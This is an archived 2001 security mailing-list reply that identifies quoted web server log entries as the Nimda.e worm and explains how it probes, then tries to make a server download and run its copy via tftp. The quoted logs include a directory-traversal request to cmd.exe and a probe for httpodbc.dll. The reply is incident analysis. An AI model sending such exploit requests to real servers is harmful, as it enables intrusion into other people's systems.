Re: New Worm Variant?

From: Ryan Russell (ryanat_private)
Date: Tue Oct 30 2001 - 09:08:42 PST

  • Next message: Bradley Filmer: "33270:trinity connection form port 80 to local machine on port"

    On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
    > [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 200 394 "-" "-"
    > [29/Oct/2001:17:09:11 -0800] "GET
    > HTTP/1.0" 200 449 "-" "-"
    >[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
    >"-" "-"
    As someone pointed out, this is Nimda.e .  What's going on here is that
    since your web server is responding with a 200 to the exploit attempt, it
    thinks it has found a vulnerable victim.  So it issues the tftp command to
    try and make your web server download a copy.  Then it sends a command to
    try to execute the file it thinks it has caused you to download.
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:

    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:41:08 PST